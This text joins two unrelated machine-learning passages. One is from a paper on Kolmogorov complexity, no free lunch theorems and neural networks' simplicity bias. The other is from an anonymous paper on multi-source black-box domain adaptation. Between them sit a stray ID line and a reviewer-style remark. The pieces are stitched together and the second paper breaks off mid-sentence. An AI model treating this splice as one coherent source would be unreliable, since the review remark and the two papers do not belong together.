K(Y|X,p) \leq -\sum_{i=1}^n \log_2 p(y_i|x_i) + 2 \text{ bits} \) (see e.g. MacKay (2003)). Models which maximize the log likelihood of the data also implicitly minimize the length of this encoding. As we derive in Appendix D, \( K(Y|X) \leq K(Y|X,p) + K(p) + 2 \log_2 K(p) + c \), where \( c \) is a small constant depending on the language. Writing the negative log likelihood in terms of the empirical cross entropy, combining our two inequalities, and dividing by the size of the dataset \( n \) yields \[ \frac{1}{n} K(Y|X) \leq \frac{\text{CE}}{\ln 2} + n^{-1}(K(p) + 2 \log_2 K(p) + c), \] where CE is the cross entropy of the classifier \( p \) averaged over dataset \( D \). This inequality implies that, regardless of how large the model is, it provides a non-trivial compression of the dataset as the size \( n \) of the dataset grows sufficiently large, as long as CE is better than random guess. To demonstrate this fact, we employ the compression scheme from Lotfi et al. (2022) in order to find a compressed representation of MLPs on several class balanced tabular classification datasets (available at openml.org). As shown in Figure 1 (left), we are able to compress the labels on most of the datasets by well over the naive \( n \log_2 C \) encoding length where \( C \) is the number of classes. We also apply the method with convolutional architectures to compress labels on CIFAR-10 and CIFAR-100 in Figure 1 (middle), allowing us to reject the hypothesis that the labeling functions are drawn uniformly at random with extremely high confidence. 3.2 A KOLMOGOROV-STYLE NO FREE LUNCH THEOREM A corollary of Equation 1 is that if the dataset is incompressible, then no model can do better than random chance in the large dataset limit, as we show in Theorem 1. Since compressible datasets in uniformly sampled data are exponentially unlikely, we can prove our own version of the no free lunch theorem with very high probability, on any given uniformly sampled dataset, learning is impossible. **Theorem 1.** Let \((X,Y)\) be a labeled dataset with \( n \) data points and uniformly sampled random labels from \( C \) classes. Then, with probability at least \( 1 - \delta \), for every classifier \( p(y|x) \), \[ \text{CE}(p) \geq \ln C - \frac{\ln 2}{n} (K(p) + 2 \log_2 K(p) + \log(1/\delta) + c), \] where \( \text{CE}(p) \) is the empirical cross entropy of the classifier \( p(y|x) \) on the data. Thus for any model of bounded size, if the size of the dataset is large enough, the model cannot represent any classifier with cross entropy appreciably smaller than that attained from random guess. Proof found in Appendix D. Figure 1: (Left): Compressed sizes of tabular labels where compression is performed via a trained MLP model (as in Section 3.1) vs. direct encoding of labels ($n \log_2 C$). (Middle): Compression of image classification datasets using CNNs. Note the breakdown of the total compressed size of the labels into model fit (NLL Bits), compressed parameters (Model Bits), and architecture and decompressor (Code Bits). In both cases, models can greatly compress a diverse suite of datasets, highlighting a common structure shared by models and real-world data. (Right): Compression based generalization bounds (Lotfi et al., 2022) for CNNs on tabular data, fed in with each pixel representing a tabular feature. The bounds are able to explain the majority of the model performance as shown by the test error, indicating that even CNNs designed for computer vision have a generic inductive bias appropriate for a wide range of datasets containing no spatial structure at all. Like any of the no free lunch theorems, the necessary existence of unsolvable problems initially seems limiting. However, learning is in fact possible on compressible datasets (ones with less than maximal complexity). Real datasets are highly unlike the high complexity samples from the uniform distribution, associated with no free lunch theorems, where learning is impossible. The common structure shared by real datasets nullifies the limitations imposed by no free lunch theorems. 4 LOW-COMPLEXITY BIAS IN MACHINE LEARNING MODELS Previously, we saw that real-world data distributions across domains share a common low Kolmogorov complexity bias. If we can construct models which prefer low-complexity data, we can hope to perform inference with a single model across many domains. While early machine learning systems incorporated highly domain-specific designs, such as handcrafted image features (Dalal & Triggs, 2005) or graphical models for language (Mnih & Hinton, 2007), modern neural network architectures across domains are converging on transformers (Vaswani et al., 2017; Dosovitskiy et al., 2020; Gulati et al., 2020; Somepalli et al., 2021), some of which can simultaneously achieve impressive performance on a variety of data types with a single architecture (Jaegle et al., 2021). In this section, we argue that neural networks have a generic simplicity bias that extends beyond the datasets for which they are designed. To this end, we: (1) feed tabular datasets from diverse domains such as click prediction and airline delay prediction into convolutional networks designed specifically for computer vision and find that they provably generalize well due to their simplicity bias, (2) formulate a language with respect to which we can measure the Kolmogorov complexity of numerical sequences and observe that GPT-3 generates low-complexity sequences with exponentially higher probability, (3) predict the next term in a sequence with randomly initialized language models. Whereas the no free lunch theorem of Wolpert (1996) implies that such an inference procedure cannot outperform random guess on average, we find that randomly initialized neural networks prefer sequence completions which generate low-complexity completed sequences, demonstrating that they can make accurate guesses as long as the true sequence distribution also favors low complexity. 4.1 BOUNDING GENERALIZATION BY COMPLEXITY Generalization bounds limit how the expected risk $R(h)$ for a model $h$ will differ from its train risk $\hat{R}(h)$. One simple such generalization bound is the finite hypothesis bound under a prior $P(h)$ (Langford & Seeger, 2001): with probability $1 - \delta$: $R(h) \leq \hat{R}(h) + \sqrt{\frac{\log 1/P(h) + \log 1/\delta}{2n}}$. Relating to Occam’s razor and Solomonoff induction, consider the universal prior that assigns higher likelihood to compressible hypotheses: $P(h) = 2^{-K_p(h)/Z}$ where $K_p(h) \leq K(h) + 2\log_2 K(h)$ is the prefix Kolmogorov complexity and $Z \leq 1$. Combining the two, we have with probability $1 - \delta$, $$R(h) \leq \hat{R}(h) + \sqrt{\frac{K_p(h) \log 2 + \log 1/\delta}{2n}}.$$ (3) Despite the simplicity of the finite hypothesis bound, when combined with the universal prior, it provides nontrivial statements about generalization even for neural networks which have many more parameters than data points (Lotfi et al., 2022). Solutions found by many machine learning models on real datasets are highly compressible, and this reflects their bias for low Kolmogorov complexity functions. Even under an arbitrarily large or even infinite hypothesis space, generalization is possible if we assign prior mass disproportionately to the highly structured data that typically occurs. 4.2 Neural Networks Prefer Naturally Occurring Labelings Across Domains The inductive biases of even specialized architectures like convolutional networks facilitate broad learning abilities. We now illustrate how a preference for low complexity alone is sufficient for a high degree of generalization, provably, since real-world data labelings tend to have low complexity. To illustrate this fact, we take tabular classification datasets and encode the tabular features as an image by simply forming images where each pixel corresponds to a different feature, zero padding as necessary. We train a small convolutional network using this input data to predict the classification labels. Since the data has no local or translation equivariant structure, learning with the convolutional network requires overcoming its strong inductive bias which was hand tailored for settings with such structure. Even in spite of this extreme mismatch, the convolutional networks perform well. Using the compression and PAC-Bayes bound methodology from Lotfi et al. (2022) (see Equation 3), we show the generalization bounds on these models along with test error in Figure 1 (right). The strong generalization of convolutional networks on tabular datasets is almost entirely explainable through simplicity bias as shown by the fact that a finite hypothesis bound nearly matches the test error. Though CNNs were designed for vision, they generalize on unrelated tabular domains, a phenomenon almost entirely explained by their preference for low-complexity solutions. 4.3 GPT-3 Assigns Exponentially Higher Probability to Simpler Sequences We now study the preference of GPT-3—a line of autoregressive LLMs—for simpler sequences. The ability of language models to solve reasoning problems has recently been studied by Zelikman et al. (2022), who develop a prompting framework, and d’Ascoli et al. (2022), who develop transformers for predicting symbolic expressions directly from the sequence. To perform our own study, we need a well-defined, computable notion of complexity. We thus define a simple, non-Turing-complete language and measure complexity with respect to this simple language. Namely, we generate integer sequences with binary expression trees. We then define the complexity of a sequence as the size of the smallest expression tree, measured by the number of internal nodes—or equivalently the number of operators in the expression represented by the tree—that generates that sequence. Note that while distinct from Kolmogorov complexity, the Kolmogorov complexity can be upper bounded by this complexity plus an added constant to encode the language. By using a small set of terms for the leaves and binary operators for the nodes, we can enumerate over all possible expression trees for small sizes at most $L$ and compute all sequences with complexities 0 through $L$. In our experiments, we use operations $+, \times$, and $//$, where $//$ denotes integer division. For leaves, we use 2 and $i$, where $i$ is the index within the sequence. For example, $(2 + i) \times i$ could be implemented with a tree of size 2 and would generate the sequence $a_i = 0, 3, 8, 15, ...$. Using this setup, we can generate sequences of varying complexity, according to a well-defined metric, and quantify the preference of GPT-3 models for simpler sequences over more complex ones. We provide details on how we tokenize sequences and extract their probabilities in Appendix F. In Figure 2, we measure the average log-probability GPT-3 models assign to sequences of a given Kolmogorov complexity, where we fix the number of numerical tokens input into the model to be 30, and we observe that the probabilities assigned by these language models decrease exponentially with sequence complexity, similar to the Solomonoff prior discussed in Section 2. In contrast, a uniform prior would be described by a flat line. Since GPT-3 outputs per-token softmax probabilities conditional on all previous tokens within their context, we can compute the log-probability of a sequence of tokens as \( \log P(\text{Sequence}) = \sum_i \log P(\text{Token}_i | \{\text{Token}_{<i}\}) \). Note we cannot easily measure the minimum description length of very complex sequences, so we limit our experiments to expression trees with at most 7 operators. In this low-complexity regime, we observe that big GPT-3 models which excel at language modeling, e.g. Davinci which contains 175 billion parameters, assign higher probability to these simple sequences than much smaller GPT-3 models such as Ada. We can also examine the decay of such log-probabilities as we feed more tokens, corresponding to digits of sequence elements, into the model. As the sequences get longer, we see in Figure 2 that the probabilities assigned to sequences decay sub-exponentially, indicating that these models, especially bigger variants such as Davinci, become more and more confident about later sequence elements. ### 4.4 Even Randomly Initialized Language Models Prefer Low Complexity The previous section examined pre-trained language models, but these models were trained on massive corpora of data. Do they prefer low complexity at initialization before they have even seen any data at all? While the initialization of neural network parameters is highly diffuse, these random parameters can induce a highly structured distribution over functions. Trained language models are known to repeat themselves (Holtzman et al., 2020; Fu et al., 2021). One might think that this behavior is learned from training data which contains repeated text, but we show that randomly initialized GPT models repeat themselves too. Interestingly, we can formalize the preference for repetition as a preference for low Kolmogorov complexity. In order to disentangle the impact of initialization from training, we adopt a simple language for generating binary sequences under which we can quickly measure Kolmogorov complexity. We consider a program to be a bitstring, and then the program upon execution simply repeats the bitstring until output reaches length 10. Under this language, the sequence 0, 0, 0, ... has Kolmogorov complexity 1, and 0, 1, 0, 1, ... has complexity 2, yet randomly generated sequences are exponentially more likely to have high complexity. We conduct our evaluations exhaustively on all such sequences of length 10. We now generate sequences of length 10 with randomly initialized GPT-2 language models (Radford et al., 2019), using each initialization to generate one sequence, and we measure the frequency with which each sequence is generated. We estimate generation probabilities by Kolmogorov complexity in Appendix G where we see again that low-complexity sequences are assigned exponentially higher probabilities. Here, we compare (1) the uniform distribution over sequences, (2) randomly initialized GPT-2, as well as (3) pre-trained GPT-2 models. We see that randomly initialized parameters induce a structured distribution over sequences, and pre-trained checkpoints exhibit an even stronger preference for low complexity as they are trained on structured text. We can also use randomly initialized language models to perform next element prediction by estimating the probabilities they assign to the next element in a sequence given having correctly generated the previous terms. While Wolpert’s no free lunch theorem (Wolpert, 1996) ensures that the average completion accuracy over all possible length 10 bitstrings is exactly 0.5, we verify in Appendix G that randomly initialized networks can be used for sequence completion when the sequence has low complexity. We can further generate very long length-100 sequences with randomly initialized and pre-trained GPT-2 models and run a simple hypothesis test, demonstrating both randomly initialized and pre-trained models generate lower Kolmogorov complexity sequences on average than a uniform distribution. We generate 100,000 samples from each of these three generative distributions and perform a one-tailed t-test on the null hypothesis that \( \mu(K(S_{\text{GPT}})) \geq \mu(K(S_{\text{U}})) \), where \( S_{\text{GPT}} \) and \( S_{\text{U}} \) respectively denote random sequences generated by the language model or a uniform distribution. Performing this hypothesis test, we reject this null hypothesis in both randomly initialized and pre- trained models with an extremely low p-value, indicating that language models are indeed more likely to generate simple sequences. Details are found in Appendix G. We conclude that neural networks for language generation, both trained and randomly initialized, express a bias towards low Kolmogorov complexity which mirrors that of data as demonstrated in Section 3 and which was previously observed for classifiers in Valle-Perez et al. (2018). Language models, both pre-trained and randomly initialized, prefer to generate low-complexity sequences. As a result, we can use even such randomly initialized models to predict the next element in a sequence, as long as the sequence is low-complexity. 5 MODEL SELECTION WITH A SIMPLICITY BIAS In typical industrial workflows, practitioners examine their data and select an appropriate learner. We can then consider the human model selector and the model they select as a single meta-learner. Whereas the no free lunch theorems seemingly preclude automated meta-learners which select performant models on any task, empirical works show that model selection can in fact be automated in practice (Vilalta & Drissi, 2002). Giraud-Carrier & Provost (2005) show that with minimal assumptions, the defeating conclusion of Wolpert’s no free lunch theorem is escaped as long as datasets share structure so that the model selector generalizes to new datasets. In this section, we argue why in principle, model selection can be automated from the view of Kolmogorov complexity. 5.1 MODEL SELECTION AND GENERALIZATION BOUNDS When developing a machine learning approach for an application, it is often helpful to leverage domain knowledge in constructing or choosing the right model for the task. One might start by choosing from families like MLPs, CNNs, GNNs, PointNets, or Transformers and then decide on the appropriate way of featurizing inputs, possibly incorporating knowledge of data symmetries via hard-coded equivariances or data augmentations. Even if we are extremely generous and suppose the practitioner is choosing from 100 million models, we can consider the impractical algorithm of selecting one via cross validation. While one might expect that such a procedure would overfit, even finite hypothesis bounds show that it does not. Using cross validation on a validation set of size 20000 for a classification problem, plugging in a uniform prior $P(h) = 1/|H| = 10^{-8}$ to the finite hypothesis bound Equation 3, we get that the gap between validation and test error will be less than 3.4% with probability greater than 99%. Ultimately, we avoid overfitting because we only need a number of data points proportional to the log of the size of the hypothesis space. This reasoning can also be applied to theoretically resolve the empirical observation in Recht et al. (2019) that we are not overfitting the test sets of popular benchmarks (more discussion in Appendix I). For an even more general class of models, one may consider the number of bits needed to specify model architectures like MLPs, CNNs, or GNNs, as well as symmetries and any other required information. In each case, the architecture can be expressed in few bits. A near state-of-the-art computer vision model can be expressed in only 280 characters (Trockman & Kolter, 2022) in PyTorch. Similarly, important symmetries like translations, rotations, reflections, and other matrix groups can be expressed in few lines of code (Finzi et al., 2021b) and can be used to encode equivariances or for augmentation. Therefore, even in selecting from all possible models that can be expressed in that short amount of code, we can expect to generalize with only tens of thousands of data points. In principle, automating model selection directly via cross validation provably generalizes well across millions of models with only thousands of data points. 5.2 ONE MODEL FOR BIG AND SMALL TRAINING SETS It is commonly believed that small training datasets demand compact architectures, whereas large training sets can accommodate flexible ones. Accordingly, practitioners hand select appropriate models for their datasets. We now show how we can intervene on the principle of combining flexibility with a simplicity bias, explored throughout the paper, to argue that a single learner can be effective for all data sizes. Our prior should prefer simple functions we believe are more likely yet support a wide variety of functions. We begin with a simple illustration on polynomial regression. **Polynomial regression.** Common intuition dictates that high degree polynomials overfit small training sets. In contrast, low degree polynomials cannot fit complicated functions so they should be avoided when training data is plentiful. However, we find that a single high degree polynomial can be effective across a wide variety of sample sizes as long as we encode a preference for low-complexity solutions, which rely on low degree coefficients. To this end, we adopt Tikhonov regularization with Tikhonov matrix $\text{diag}((\alpha k^2)_{k=0}^{d})$; in particular, we impose an $\ell_2$ penalty that increases quadratically with the degree of the corresponding monomial. In Appendix H, we see that this model, which is flexible yet has a strong simplicity bias, performs at least on par with a low degree polynomial when training data is scarce, and with a high degree polynomial when training data is abundant. **Neural networks.** We illustrate a similar concept with neural networks. We consider a small network, GoogLeNet (Szegedy et al., 2015), which performs well on small datasets such as CIFAR-10 and CIFAR-100 (Krizhevsky, 2009), but poorly on larger datasets like ImageNet (Deng et al., 2009). We also consider a large network, ViT-B/16 (Dosovitskiy et al., 2020), which performs significantly worse on CIFAR variants but better on ImageNet. As in the polynomial example, we can combine these two architectures, specifying our preference for GoogLeNet to the extent that it fits the training data. We train both models and then take a convex combination of their logits, $c \cdot \text{logits}_{\text{ViT}} + (1 - c) \cdot \text{logits}_{\text{G}}$, controlled by a parameter $c$ with $\ell_2$ regularization in favor of GoogLeNet (i.e., by adding $\lambda c^2$ to the loss function). In Figure 3, we observe that while GoogLeNet and ViT each have strengths and weaknesses, combining them with a preference for simplicity achieves the best of both worlds. While aggressively restricting our architectures can decrease computational cost, it is unnecessary for generalization. In other words, while GoogLeNet and ViT can be combined into a single learner with greater flexibility than GoogLeNet, and a stronger simplicity bias than ViT, so that manual selection between them is not required across data size. In summary, flexible models with a low-complexity bias can be a one-stop-shop for machine learning since real-world data prefers low complexity. We do not need to compromise on flexibility in order to express a preference for low complexity solutions. Instead, follow Occam’s Razor and choose the simplest explanation for the training set. We provide experimental details and additional experiments with Swin Transformer (Liu et al., 2021) in Appendix H. A single model can work well with both small and large training sets, so long as we embrace flexibility combined with a soft simplicity bias. ### 6 DISCUSSION While large ML models are highly flexible, we saw that they reliably prefer low Kolmogorov complexity solutions—aligning well with relevant learning problems—despite not being designed with complexity in mind. This observation raises the question: why exactly do neural networks encode such a strong preference for low complexity and how can we tune this preference? Complementing the above observation, we also saw that a single expressive model which simultaneously supports a diversity of solutions but prefers simple ones can solve both simple and hard problems across sample sizes. Such learners present clear advantages over the current paradigm in deep learning in which we manually select small constrained architectures or large ones with mild inductive biases, depending on the problem. Keeping this possibility in mind, can we design expressive yet simplicity-biased models with affordable computational costs? We include an extended discussion of several fundamental themes that surface throughout the paper in Appendix I. REFERENCES Pierre Alquier. User-friendly introduction to PAC-Bayes bounds. *arXiv preprint arXiv:2110.11216*, 2021. Idan Amir, Tomer Koren, and Roi Livni. Sgd generalizes better than gd (and regularization doesn’t help). In *Conference on Learning Theory*, pp. 63–92. PMLR, 2021. Sanjeev Arora, Rong Ge, Behnam Neyshabur, and Yi Zhang. Stronger generalization bounds for deep nets via a compression approach. In *International Conference on Machine Learning*, pp. 254–263. PMLR, 2018. Gregory Benton, Wesley J Maddox, Jayson Salkey, Julio Albinati, and Andrew Gordon Wilson. Function-space distributions over kernels. *Advances in Neural Information Processing Systems*, 32, 2019. David M Blei, Andrew Y Ng, and Michael I Jordan. Latent dirichlet allocation. *Journal of Machine Learning Research*, 3(Jan):993–1022, 2003. Léonard Blier and Yann Ollivier. The description length of deep learning models. *Advances in Neural Information Processing Systems*, 31, 2018. Lorenzo Brigato and Luca Iocchi. A close look at deep learning with small data. In *2020 25th International Conference on Pattern Recognition (ICPR)*, pp. 2490–2497. IEEE, 2021. Tom Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared D Kaplan, Prafulla Dhariwal, Arvind Neelakantan, Pranav Shyam, Girish Sastry, Amanda Askell, et al. Language models are few-shot learners. *Advances in neural information processing systems*, 33:1877–1901, 2020. Gregory J Chaitin. Information-theoretic limitations of formal systems. *Journal of the ACM (JACM)*, 21(3):403–424, 1974. Ping-yeh Chiang, Renkun Ni, David Yu Miller, Arpit Bansal, Jonas Geiping, Micah Goldblum, and Tom Goldstein. Loss landscapes are all you need: Neural network generalization can be explained without the implicit bias of gradient descent. In *The Eleventh International Conference on Learning Representations*, 2023. Biagio Ciuffo and Vincenzo Punzo. “no free lunch” theorems applied to the calibration of traffic simulation models. *IEEE Transactions on Intelligent Transportation Systems*, 15(2):553–562, 2013. Navneet Dalal and Bill Triggs. Histograms of oriented gradients for human detection. In *2005 IEEE computer society conference on computer vision and pattern recognition (CVPR’05)*, volume 1, pp. 886–893. Ieee, 2005. Stéphane d’Ascoli, Pierre-Alexandre Kamienny, Guillaume Lample, and François Charton. Deep symbolic regression for recurrent sequences. *arXiv preprint arXiv:2201.04600*, 2022. Giacomo De Palma, Bobak Kiani, and Seth Lloyd. Random deep neural networks are biased towards simple functions. *Advances in Neural Information Processing Systems*, 32, 2019. Jia Deng, Wei Dong, Richard Socher, Li-Jia Li, Kai Li, and Li Fei-Fei. Imagenet: A large-scale hierarchical image database. In *2009 IEEE conference on computer vision and pattern recognition*, pp. 248–255. Ieee, 2009. Alexey Dosovitskiy, Lucas Beyer, Alexander Kolesnikov, Dirk Weissenborn, Xiaohua Zhai, Thomas Unterthiner, Mostafa Dehghani, Matthias Minderer, Georg Heigold, Sylvain Gelly, et al. An image is worth 16x16 words: Transformers for image recognition at scale. In *International Conference on Learning Representations*, 2020. Gintare Karolina Dziugaite and Daniel M Roy. Computing nonvacuous generalization bounds for deep (stochastic) neural networks with many more parameters than training data. *arXiv preprint arXiv:1703.11008*, 2017.
JGTC6WgO4T
Furthermore, when the cardinality of 'Ic' is 'M', there is another possible scenario where all source models have identical predictions. The paper does not explicitly mention this, which is a lack of rigor.
LABEL SPACE-INDUCED PSEUDO LABEL REFINEMENT FOR MULTI-SOURCE BLACK-BOX DOMAIN ADAPTATION Anonymous authors Paper under double-blind review ABSTRACT Unsupervised Domain Adaptation (UDA) aims to train a model for an unlabeled target domain by transferring knowledge from a source domain. However, standard UDA requires access to source data and models, prohibiting its practical application in terms of privacy and security. Black-Box DA (BDA) reduces such constraints by defining a pseudo label from a single source prediction, which allows for self-training of the target model. Nonetheless, existing methods have limited consideration for multi-source settings, in which multiple source domains are available to generate pseudo labels. In this work, we introduce a novel training framework for multi-source BDA (MSBDA), dubbed Label Space-Induced Pseudo Label Refinement (LPR). Specifically, LPR incorporates a Pseudo label Refinery Network (PRN) that learns the relation between each source conditioned by the target from source predictions. The target model is adapted by self-learning using a pseudo label generated by PRN. We provide theoretical supports for the performance of the LPR. Experimental results on four benchmark datasets demonstrate that MSBDA using LPR achieves highly competitive performance compared to state-of-the-art approaches with different DA settings. 1 INTRODUCTION Unsupervised domain adaptation (UDA) is used to transfer domain knowledge acquired from a labeled source domain to an unlabeled target domain. The primary goal of UDA is to mitigate the impact of distribution shifts between the source and target domains, while reducing the labeling burden in the target domain (Saito et al., 2018; Long et al., 2015; Sun & Saenko, 2016; Long et al., 2017). However, existing UDA methods still demand labeled source data (Ganin et al., 2016; Long et al., 2015) or the parameters of a source model (Qu et al., 2021; Liang et al., 2020) to train a target model. These requirements impede the deployment of a target model in real-world applications, and they also raise concerns about privacy and security (Dong et al., 2020; Jaradat, 2017). Black-box DA (BDA) (Zhang et al., 2021; Liang et al., 2022; Liu et al., 2022b; Yang et al., 2022) has been proposed for a target model to adapt using only the prediction of a source model in an unlabeled target domain. No other knowledge from the source domain is utilized. Due to the limited resources, a straightforward BDA approach would generate pseudo labels from a source model and directly use them for adaptation. The primary concern is the qualities of pseudo labels. Liu et al. (2022b) created a pseudo label through a weighted sum of source and target prediction, in which the weight parameters changed with the confidence of a target prediction. Liang et al. (2022) tried to reduce noise in source prediction using adaptive label smoothing. Previous BDA methods have used a single source model, assuming that the distributions of source and target domains would be sufficiently correlated. It is natural and necessary to consider multiple source domains in BDA (MSBDA), because a user can select one or more source APIs. However, the correlation of source domains is usually unknown for the target adaptation, which could be more realistic but challenging than the BDA. There are only few MSBDA studies (Liang et al., 2022). Liang et al. calculated the average of the individual source predictions to extend their original BDA method to an MSBDA method. However, they ignored the different importance of source models. In this paper, we propose a novel self-supervised pseudo-labeling framework for MSBDA to effectively train a target model. While existing BDA methods have neglected to consider various characteristics of different sources, the proposed method focuses on exploring statistical relations with the source domains and extracting useful information from them. According to our theoretical analysis, a risk factor of a source prediction, which expresses how a target error of a hypothesis is deviated from an oracle error, can determine a positive or negative impact on the efficacy of pseudo label generation. Based on this, we propose a pseudo-label refinery network (PRN) with the division of a label space to produce confident source predictions to facilitate positive knowledge transfer. The optimization is conducted by focusing on the concentration of source predictions within a label space and closeness to other label spaces as presented in Figure 1, motivated by our theoretical analysis. In contrast, assigning an equal contribution on every prediction would be sub-optimal, because some predictions may have negative impacts. The main contributions of this work include as follows: • We develop a novel MSBDA framework that leverages only the predictions of source models to explore positive knowledge from multiple source domains. To the best of our knowledge, this work is the first to explore positive knowledge from multiple source domains, which is a challenging yet significant task in the field of MSBDA. • We present a theoretical analysis to demonstrate the effectiveness of the proposed training strategy and propose the PRN architecture, specifically designed to resolve complex relations in source and target domains and refine a pseudo label. • We evaluate the proposed method on four benchmark datasets and demonstrate that it outperforms state-of-the-art methods in various domain adaptation settings. 2 RELATED WORKS UDA. Conventional UDA aims to adapt a target model in an unlabeled target domain, by leveraging the learned knowledge from a labeled source domain. Several studies (Long et al., 2015; Sun & Saenko, 2016; Long et al., 2017; Yan et al., 2017; Saito et al., 2018; Lee et al., 2019) have attempted to minimize the statistical discrepancy between source and target domains. Meanwhile, adversarial learning-based UDA methods have been presented to align source and target domains in feature-level (Tzeng et al., 2017; Long et al., 2018), pixel-level (Bousmalis et al., 2017; Sankaranarayanan et al., 2018; Xu et al., 2020b), and category-level (Saito et al., 2018; Xie et al., 2018; Pan et al., 2019; Xu et al., 2020a). These methods demand to access source data or the parameters of a source model. Multi-source domain adaptation (MSDA). MSDA is an extension of the standard DA, when it is unclear which source domains are best suited for a target adaptation. In (Mansour et al., 2008), the distribution of a target domain was approximated through a mixture of those of source domains. (Hoffman et al., 2018a; Zhao et al., 2018; Li et al., 2018) derived theoretical cross-domain bounds to model the discrepancy among multiple source domains. (Zhao et al., 2018) proposed multiple domain adversarial networks (MDAN) to learn invariant features to various sources. (Xu et al., 2018) presented a deep cocktail network (DCTN) to address category shifts. Peng et al. (2019) developed a dynamic method to align the moments of source and target feature distributions. **Source-free domain adaptation (SFDA).** SFDA further eliminated the accessibility to raw source data from the UDA setting and used pseudo-labeling as an enabling method (Liang et al., 2020; Qiu et al., 2021; Ahmed et al., 2021). Qiu et al. (2021) used confidence re-weighting and regularization to reduce the negative transfer by noisy pseudo labels. Ahmed et al. (2021) introduced a solution for multi-source SFDA, by combining the source models with suitable weights. Their model achieved comparable performance to the best choice of a single source model. **BDA.** There have been several studies (Zhang et al., 2021; Liang et al., 2022; Liu et al., 2022b; Yang et al., 2022) to solve the BDA problems. In Liang et al. (2022), an adaptive label smoothing and a structural knowledge distillation have been proposed to approximate a target prediction to source predictions. In Liu et al. (2022b), a level of confidence has been calculated for pseudo-labeling and a target adaptation. Our work is substantially different from the previous studies, when bridging the BDA and multi-source setting. **Pseudo-labeling.** It has been widely used for UDA to overcome the lack of labeled data in a target domain, when the source data or model are not directly accessible. Self-training is applied to produce a pseudo label using a source prediction and use it to fine-tune a target model. Liang et al. (2022) used pseudo-labeling in a black-box setting. Since these methods assumed single-source DA, they were not directly applicable to MSDA. Xu et al. (Xu et al., 2018) and Wang et al. (Wang et al., 2020) used hard pseudo-labeling to learn the interaction among domains. Different from these studies, we use a deep model to apply weighted distribution through self-attention and refining pseudo-labels. ### 3 METHODOLOGY #### 3.1 Problem Formulation We address an adaptation of a $K$-way classification model in an MSBDA setting. There are $M$ labeled source domains $\mathcal{D}_S = \{\mathcal{D}_1, \mathcal{D}_2, \ldots, \mathcal{D}_M\}$ and one unlabeled target domain $\mathcal{D}_T$. $\mathcal{X}_i$ and $\mathcal{Y}_i$ refer to the set of input samples and their annotations from $\mathcal{D}_i$, respectively. We assume that the source domain and target domain share the same label space, i.e., $\mathcal{Y}_i = \mathcal{Y}_T$ for all $i$. In contrast, $x_i \in \mathcal{X}_i$ and $x_T \in \mathcal{X}_T$ display different distributions. A source model $f_i \in f_S = \{f_1, f_2, \ldots, f_M\}$ has been trained using $\mathcal{D}_i$ and used in a target domain. Then, $p_i = f_i(x_T) \in \mathcal{P}$ is the only means to generate a pseudo label $\hat{p}$ for the target adaptation. The previous methods (Xu et al., 2018; Wang et al., 2020) relied on a hard decision using $p_i$ to generate a pseudo label. The proposed method aims to reduce an upper bound of a risk, which estimates how a target error of a hypothesis is deviated from the oracle error, to produce an appropriate pseudo label. We explain the theoretical foundation and the proposed adaptation mechanism in the following sections. All the proofs of theorems are provided in the supplementary material. #### 3.2 Theoretical Analysis Denote $y_T$ as the ground-truth label of a target sample, which is unknown, and $h \in \mathcal{H}$ as a hypothesis of a target model, respectively. Given a pseudo label $\hat{p}$, our goal is to find a theoretic upper bound of a difference between a target error $\epsilon(h, \hat{p}) = \mathbb{E}_{x \in \mathcal{X}_T}[\|h(x) - \hat{p}\|]$ and the oracle error $\epsilon(h, y_T) = \mathbb{E}_{x \in \mathcal{X}_T}[\|h(x) - y_T\|]$, because the minimization of the bound can serve as a risk mitigation strategy to ensure that $\hat{p}$ is reliable for adaptation. For $\hat{p}$, a weighted linear combination of each source output has been a popular choice (Hoffman et al., 2018a; Zhao et al., 2018; Li et al., 2018). Following the assumption, we derive a general upper bound (Yang et al., 2022) for the MSBDA as in **Theorem 1**. **Theorem 1.** (General upper bound of a risk in target prediction) Denote $h$ as a hypothesis in $\mathcal{H}$. We then establish a theoretical upper bound on the difference between the target error and the oracle error as $$|\epsilon(h, \hat{p}) - \epsilon(h, y_T)| \leq \sum_i \alpha_i \epsilon(p_i, y_T),$$ where a pseudo label is defined as $\hat{p} = \sum_i \alpha_i p_i$, $\alpha_i \geq 0$, $\sum_i \alpha_i = 1$. Existing BDA methods (Liang et al., 2022; Liu et al., 2022a,b) have attempted to decrease empirical errors e.g. through de-noising of source predictions and label smoothing, when \( y_T \) is not accessible. Instead, in this framework, we modify the general bound using tractable terms without the ground truth to provide a practical solution. For this purpose, we first define a representative prediction, denoted as \( p_c \), which is assumed to be the one closest to the ground truth among the available source predictions. We then modify the theoretic upper bound, by considering \( p_c \). **Lemma 1. (Modified upper bound of a risk)** \[ |e(h, \hat{p}) - e(h, y_T)| \leq e(p_c, y_T) + \eta, \] where \( p_c = \arg \min_{p_i \in P} e(p_i, y_T) \), and \( \eta = \sum_i \alpha_i e(p_c, p_i) \). In the bound derived in Lemma 1, \( \eta \) represents a degree of the dispersion of source predictions from the center at \( p_c \) due to the weighted error terms. \( \eta \) can be directly estimated with the accessible terms of source predictions, and the minimization of \( \eta \) could reduce the upper bound of a risk associated with the reliability of a pseudo label as in Eq.(2). However, there would be some noisy outliers among source predictions to hinder the optimization. When most of \( p_i \) are dispersed from \( p_c \), \( p_c \) needs to move away from \( y_T \) to avoid the penalty, which leads to a sub-optimal solution. To avoid the failure, we consider a division of a label space and decompose the bound into tractable terms. Let us assume there exist \( P_c \) and \( P_d \subset P \) as two subsets of an entire label space. \( P_c \) and \( P_d \) are defined as the spaces, in which their samples are concentrated to \( p_c \) and dispersed from \( p_c \), respectively. They are mathematically defined as follows: \[ P_c = \{ p_i | e(p_c, p_i) \leq \xi \}, \quad P_d = P \setminus P_c, \] where \( \xi \) denotes a threshold for the label space division. Then, we define the degree of the dispersion of each label space as below, \[ \eta_c = \sum_{p_i \in P_c} \alpha_i e(p_c, p_i), \quad \eta_d = \sum_{p_i \in P_d} \alpha_i e(p_d, p_i), \] where \( p_d = \arg \min_{p_i \in P_d} e(p_c, p_i) \). **Theorem 2. (Upper bound of a risk with a label space division)** \[ |e(h, \hat{p}) - e(h, y_T)| \leq e(p_c, y_T) + \eta_c + \eta_d + \sum_{p_i \in P_d} \alpha_i e(p_c, p_d), \] where \( p_d = \arg \min_{p_i \in P_d} e(p_c, p_i) \) is the representative prediction in \( P_d \). \( \eta_c = \sum_{p_i \in P_c} \alpha_i e(p_c, p_i) \) and \( \eta_d = \sum_{p_i \in P_d} \alpha_i e(p_d, p_i) \) are the dispersion of \( P_c \) and \( P_d \), respectively. As presented in 